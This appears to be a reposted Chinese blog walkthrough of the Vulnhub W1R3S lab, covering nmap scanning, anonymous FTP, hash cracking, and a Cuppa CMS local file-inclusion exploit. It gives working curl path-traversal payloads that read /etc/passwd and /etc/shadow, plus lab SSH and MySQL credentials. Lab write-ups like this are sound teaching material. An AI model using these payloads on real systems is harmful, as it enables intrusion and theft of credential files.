文章总结： 文档详细记录了Vulnhub靶场w1r3s的渗透实战过程。通过Nmap进行端口扫描与指纹识别，利用FTP匿名登录获取线索。经目录扫描发现CuppaCMS，利用其文件包含漏洞成功读取系统敏感文件。通过破解获取的哈希值登入SSH，发现用户具备完整sudo权限从而提权成功，并进一步接管MySQL数据库。该文完整演示了从信息搜集到提权的攻击链，具有较高的实战参考价值。 综合评分： 85 文章分类： 渗透测试,红队,实战经验,WEB安全,漏洞POC

---

跟着红队笔记打靶：w1r3s

原创

网安热爱者week 网安热爱者week

week的杂货铺

2026年3月5日 21:00 江苏

靶场地址：

https://www.vulnhub.com/entry/w1r3s-101,220/

大佬的视频：

【「红队笔记」靶机精讲：W1R3S 1.0.1 – 渗透测试思路为王，细节多到即使对于纯萌新也能无感入圈。】https://www.bilibili.com/video/BV1mB4y1j7K6?vd_source=3caf2dac9c9273de4d9b0fead4712250

1. 信息搜集：

1.1. 主机发现：

sudo nmap -sn 192.168.137.0/24

139为靶机

-sn n 表示不进行端口扫描 仅进行主机搜索 会有一个轻度探测

请求：icmp回显 syn请求443 tcp/ack请求80 默认icmp时间戳请求

或者使用：

sudo arp-scan -l

这里会有一个打不开文件

使得厂商扫描不出来

没找到解决方式。

1.2. 端口扫描：

sudo nmap -sT --min-rate 10000 -p- 192.168.137.139 -oA ./nmapscan

默认使用的是-sS 仅syn扫描 快速

部分防火墙会使用禁止仅syn 甚至标记警告

 -sT 是完成整个握手流程进行tcp扫描。

–min-rate 最慢发包速率 实际要足够慢

-oA 输出扫描结果

发现端口：

21 ftp

22 ssh

80

3306 mysql

扫到的端口命名成环境变量

ports=$(grep open ./nmapscan/port.nmap | awk -F "/" '{print $1}'| paste -sd ',')

awk -F “/” ‘{print $1}’

使用/进行分隔 打印出第一行

 paste -sd ‘,’

-s 指定生成为一行

-d ‘,’ 指定使用,进行分隔

1.3. 详细扫描：

1.3.1. TCP：

sudo nmap -sT -sV -sC -O -p$ports 192.168.137.139 -oA ./nmapscan/details

这是最重的一次扫描

-sT使用tcp

-sV查看版本

-sC使用默认脚本

-O 查看系统版本

ftp Anonymous 匿名登入

1.3.2. UDP:

sudo nmap -sU --top-ports 20 192.168.137.139 -oA ./target/w1r3s/nmapscan/udp

1.4. 默认脚本扫描：

sudo nmap --script=vuln -p$port 192.168.137.139 -oA ./nmapscan/vuln

有一个ddos

有一个目录泄露 wordpress

2. 渗透测试：

2.1. ftp未授权访问：

这里名字要使用anonymous

记得使用binary模式进行文件传输

关闭下载确认：

单次实现多文件下载：

剩下的就逐个下载

读一下文本：

从上到下依次是

一段使用了leetspeak的文字

一个md5加密

【使用下面这个命令进行md5识别】

hash-identifier 01ec2d8fc11c493b25029fb1f47f39ce

解密使用john 【把刚才的密文放进w1r3.hash】

john 01ec2d8fc11c493b25029fb1f47f39ce

最后是从别的网站直接找到的记录

一个base64

一个ascii_logo ：

https://www.perfcode.com/tools/generator/ascii-art

一个员工信息的列表

两行反转字： https://www.tools366.com/zh-CN/tool/upside-down-text-online-tool

2.2. 网页端：

2.2.1. 目录扫描：

sudo gobuster dir -u http://192.168.137.139 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

http://192.168.137.139/wordpress/ 会跳转到localhost 【改host文件没成功】

kali好像不允许localhost指向其他ip

http://192.168.137.139/javascript/

http://192.168.137.139/administrator

这应该是一个cms安装的导航

实际情况下 尽量不碰

但是这里实在是没有其他攻击面了。。。

Cuppa cms

2.2.2. cuppa cms【文件包含】

这里他的database拼写错了 所以也是一个特征 可以进行相关的搜索

查一下历史漏洞：

searchsploit cuppa cms -m 25971

一个文件包含

测试出来的漏洞路径：

http://192.168.137.139/administrator/alerts/alertConfigField.php

没反应。。。

去github看了源码：

使用post传参就好了

这里也尝试了使用远程文件包含 但是没有成功。

读/etc/passwd

用curl实现:

curl --data-urlencode "urlConfig=../../../../../../../../../etc/passwd" http://192.168.137.139/administrator/alerts/alertConfigField.php

只要第二列是x编码 就可以看一下/etc/shadow

curl --data-urlencode "urlConfig=../../../../../../../../../etc/shadow" http://192.168.137.139/administrator/alerts/alertConfigField.php

2.3. ssh登入：

john解密密码 发现

 w1r3s密码是computer

然后ssh连接：

用户是完全的sudo权限。

2.3.1. mysql接管：

root Iamroot!

---

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：week的杂货铺 网安热爱者week 网安热爱者week《跟着红队笔记打靶：w1r3s》